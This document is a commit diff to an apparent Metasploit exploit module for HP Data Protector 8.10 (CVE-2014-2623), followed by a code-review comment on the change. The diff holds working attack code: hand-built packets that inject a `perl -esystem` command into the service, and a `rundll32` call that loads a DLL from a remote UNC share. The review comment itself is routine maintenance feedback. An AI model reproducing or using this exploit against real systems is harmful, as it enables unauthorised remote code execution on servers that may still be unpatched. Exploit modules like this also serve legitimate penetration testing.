Clean packet building
parent
e04ff3ee24
commit
62dde22d88
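--- a/<module path not shown on page>
+++ b/<module path not shown on page>
@@ -26,8 +26,9 @@ class Metasploit3 < Msf::Exploit::Remote
 'References' =>
 [
 ['CVE', '2014-2623'],
+['OSVDB', '109069'],
 ['EDB', '34066'],
-['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'],
+['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818']
 ],
 'DefaultOptions' =>
 {
@@ -37,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'Platform' => 'win',
 'Targets' =>
 [
-[ 'HP Data Protector 8.10', { 'Offset' => 46 } ],
+[ 'HP Data Protector 8.10 / Windows', { } ],
 ],
 'DefaultTarget' => 0,
 'DisclosureDate' => 'Nov 02 2014'))
@@ -90,21 +91,21 @@ class Metasploit3 < Msf::Exploit::Remote
 Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
 end
 
-def exec_bar(cmd)
+def send_pkt(cmd)
 cmd.gsub!("\\", "\\\\\\\\")
 
-cmd_no = target['Offset'] + cmd.length
-
-pkt = "\x00\x00\x00"
-pkt << cmd_no
-pkt << "\x32\x00\x01\x01\x01\x01\x01\x01\x00\x01\x00\x01"
-pkt << "\x00\x01\x00\x01\x01\x00\x20\x32\x38\x00\x5c\x70"
-pkt << "\x65\x72\x6c\x2e\x65\x78\x65\x00\x20\x2d\x65\x73\x79\x73\x74\x65\x6d" # perl -e system('cmd')
-pkt << "('#{cmd}')" # Executable
-pkt << "\x00"
+pkt = "2\x00"
+pkt << "\x01\x01\x01\x01\x01\x01\x00"
+pkt << "\x01\x00"
+pkt << "\x01\x00"
+pkt << "\x01\x00"
+pkt << "\x01\x01\x00 "
+pkt << "28\x00"
+pkt << "\\perl.exe\x00 "
+pkt << "-esystem('#{cmd}')\x00"
 
 connect
-sock.put(pkt)
+sock.put([pkt.length].pack('N') + pkt)
 disconnect
 end
 
@@ -114,6 +115,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 print_status("#{peer} - Trying to execute remote DLL...")
 sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
-exec_bar(sploit)
+send_pkt(sploit)
 end
 end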
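Review bot: The new length prefix in `sock.put([pkt.length].pack('N') + pkt)` counts characters rather than bytes, so it disagrees with the data actually written whenever the interpolated `cmd` holds a multibyte character; `sock.put([pkt.bytesize].pack('N') + pkt)` is the byte count the prefix presumably describes. The kept `cmd.gsub!("\\", "\\\\\\\\")` mutates the caller's string in place, so `sploit` in the exploit method is altered after `send_pkt(sploit)` returns; `cmd = cmd.gsub("\\", "\\\\\\\\")` keeps send_pkt free of that side effect. The rewrite also drops the only explanation the old body carried (`# perl -e system('cmd')`), leaving a run of bare byte literals; a short comment above `pkt = "2\x00"` naming what the fixed fields and the `28\x00` / `\\perl.exe` pieces are would let the next maintainer read the packet without the previous revision.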